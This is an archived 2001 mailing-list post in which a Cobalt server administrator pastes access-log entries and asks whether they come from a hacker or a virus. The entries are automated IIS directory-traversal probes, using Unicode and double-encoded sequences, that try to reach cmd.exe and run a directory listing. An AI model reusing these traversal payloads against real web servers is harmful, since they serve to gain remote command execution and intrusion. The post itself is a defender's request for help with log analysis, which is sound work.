[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] access log weird stuff. hacker or virus

Hello,
I went and check my access log and see this stuff.
Looking for winnt on a linux system ?


 tail access
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /_me
m_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
280 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:17 -0400] "GET /msa
dc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/c
md.exe?/c+dir HTTP/1.0" 302 308 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 235 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 260 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
www.florida-wireless.com 208.62.153.5 - - [28/Sep/2001:00:30:18 -0400] "GET /scr
ipts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 259 "-" "-"
[root httpd]#